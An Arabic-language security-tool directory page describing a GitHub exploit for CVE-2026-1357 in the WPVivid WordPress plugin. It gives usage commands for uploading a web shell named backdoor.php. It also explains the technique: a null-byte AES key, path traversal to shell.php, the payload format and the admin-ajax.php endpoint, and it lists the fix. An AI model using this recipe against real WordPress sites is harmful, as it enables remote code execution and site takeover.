Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit-CVE-2026-1357 — استغلال لثغرة CVE-2026-1357 في إضافة WPVivid الخاصة بووردبريس، مما يتيح تنفيذ الأوامر عن بُعد عبر حمولات مشفّرة بتقنية AES مصمّمة بعناية، وتجاوز المسارات لرفع قشرة ويب. | Kitploit
أدوات/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

استغلال لثغرة CVE-2026-1357 في إضافة WPVivid الخاصة بووردبريس، مما يتيح تنفيذ الأوامر عن بُعد عبر حمولات مشفّرة بتقنية AES مصمّمة بعناية، وتجاوز المسارات لرفع قشرة ويب.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تثبيت التبعيات

pip3 install pycryptodome requests

استغلال أساسي

python3 wpvivi.py http://target.com

ويب شيل مخصص

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" شرح تقني: Null Byte Key: عندما يفشل فك تشفير RSA، فإنه يُرجع false، وهو ما تتعامل معه phpseclib على أنه "\x00\x00\x00". نستخدم 16 بايت فارغ كمفتاح AES-128 ECB. Directory Traversal: اسم الملف لا يتم تنظيمه، مما يسمح بـ ../../../../wp-content/uploads/shell.php تنسيق الحمولة:

[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] التنفيذ: POST إلى /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(الحمولة المشفرة) الكشف والتخفيف:

تم إصلاحه في 0.9.124:

  • تحقق if ($key === false || empty($key)) return false;
  • القائمة البيضاء للامتدادات: zip,gz,tar,sql
تنزيل الأداة